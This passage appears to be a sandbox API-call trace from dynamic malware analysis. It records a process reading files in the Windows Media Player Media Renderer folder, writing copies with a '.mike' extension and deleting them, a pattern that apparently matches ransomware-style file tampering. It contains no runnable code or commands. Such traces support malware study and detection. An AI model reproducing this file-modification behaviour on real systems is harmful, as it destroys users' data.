Renderer\\connectionmanager_dmr.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.859] GetFileType (hFile=0x288) returned 0x1 [0100.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0100.859] GetFileType (hFile=0x288) returned 0x1 [0100.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0100.860] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0100.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0100.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.860] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml"), fInfoLevelId=0x0, lpFileInformation=0x221c964 | out: lpFileInformation=0x221c964*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828f4a85, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828f4a85, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x8b1f3147, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x14ff)) returned 1 [0100.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.860] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpFilePart=0x0) returned 0x4e [0100.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.860] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml"), fInfoLevelId=0x0, lpFileInformation=0x221ccb8 | out: lpFileInformation=0x221ccb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828f4a85, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828f4a85, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x8b1f3147, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x14ff)) returned 1 [0100.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.860] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpFilePart=0x0) returned 0x4e [0100.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.861] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0100.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.861] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpFilePart=0x0) returned 0x4e [0100.861] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpFilePart=0x0) returned 0x4e [0100.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0100.861] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0100.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0100.861] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike", lpFilePart=0x0) returned 0x53 [0100.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.861] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.862] GetFileType (hFile=0x288) returned 0x1 [0100.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.862] GetFileType (hFile=0x288) returned 0x1 [0100.862] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0100.862] WriteFile (in: hFile=0x288, lpBuffer=0x221dc7c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x221dc7c*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0100.863] CloseHandle (hObject=0x288) returned 1 [0100.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0100.863] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml"), fInfoLevelId=0x0, lpFileInformation=0x221d720 | out: lpFileInformation=0x221d720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828f4a85, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828f4a85, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x8b1f3147, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x14ff)) returned 1 [0100.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0100.863] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpFilePart=0x0) returned 0x4e [0100.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0100.863] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.864] GetFileType (hFile=0x288) returned 0x1 [0100.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0100.864] GetFileType (hFile=0x288) returned 0x1 [0100.864] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0100.864] ReadFile (in: hFile=0x288, lpBuffer=0x221edd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x221edd0*, lpNumberOfBytesRead=0x2af110*=0x14ff, lpOverlapped=0x0) returned 1 [0100.865] CloseHandle (hObject=0x288) returned 1 [0100.866] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike", lpFilePart=0x0) returned 0x53 [0100.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.866] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.866] GetFileType (hFile=0x288) returned 0x1 [0100.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.866] GetFileType (hFile=0x288) returned 0x1 [0100.866] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0100.866] WriteFile (in: hFile=0x288, lpBuffer=0x2228424*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2228424*, lpNumberOfBytesWritten=0x2af124*=0x1500, lpOverlapped=0x0) returned 1 [0100.867] CloseHandle (hObject=0x288) returned 1 [0100.867] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike", lpFilePart=0x0) returned 0x53 [0100.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0100.867] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.867] GetFileType (hFile=0x288) returned 0x1 [0100.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0100.867] GetFileType (hFile=0x288) returned 0x1 [0100.868] WriteFile (in: hFile=0x288, lpBuffer=0x222bcd4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x222bcd4*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0100.868] CloseHandle (hObject=0x288) returned 1 [0100.868] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpFilePart=0x0) returned 0x4e [0100.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.869] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56972a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x56972a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x56972a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x1720)) returned 1 [0100.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.869] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpFilePart=0x0) returned 0x4e [0100.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.869] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x222d47c | out: lpFileInformation=0x222d47c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56972a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x56972a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x56972a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x1720)) returned 1 [0100.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.869] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpFilePart=0x0) returned 0x4e [0100.869] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", dwFileAttributes=0x80) returned 0 [0100.870] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpFilePart=0x0) returned 0x4e [0100.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0100.870] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af134 | out: lpFileInformation=0x2af134*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56972a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x56972a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x56972a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x1720)) returned 1 [0100.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0100.871] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpFilePart=0x0) returned 0x4e [0100.871] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml.mike")) returned 1 [0100.872] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.872] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0100.872] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0100.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0100.873] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aeba8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0100.874] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.874] GetFileType (hFile=0x288) returned 0x1 [0100.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0100.874] GetFileType (hFile=0x288) returned 0x1 [0100.874] CloseHandle (hObject=0x288) returned 1 [0100.876] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.876] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.876] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0100.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0100.876] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0100.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0100.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.876] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2230260 | out: lpFileInformation=0x2230260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828f4a85, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828f4a85, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0xba3)) returned 1 [0100.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.876] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0100.876] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2230560 | out: lpFileInformation=0x2230560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828f4a85, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828f4a85, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0xba3)) returned 1 [0100.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0100.876] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.877] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", lpFilePart=0x0) returned 0x45 [0100.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0100.877] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0100.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0100.877] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.877] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.877] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x40 [0100.877] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", lpFilePart=0x0) returned 0x45 [0100.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0100.877] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0100.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0100.877] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike", lpFilePart=0x0) returned 0x45 [0100.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0100.877] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.878] GetFileType (hFile=0x288) returned 0x1 [0100.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0100.878] GetFileType (hFile=0x288) returned 0x1 [0100.878] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0100.878] WriteFile (in: hFile=0x288, lpBuffer=0x2231310*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2231310*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0100.879] CloseHandle (hObject=0x288) returned 1 [0100.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0100.879] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2230e40 | out: lpFileInformation=0x2230e40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828f4a85, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828f4a85, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0xba3)) returned 1 [0100.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0100.879] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, 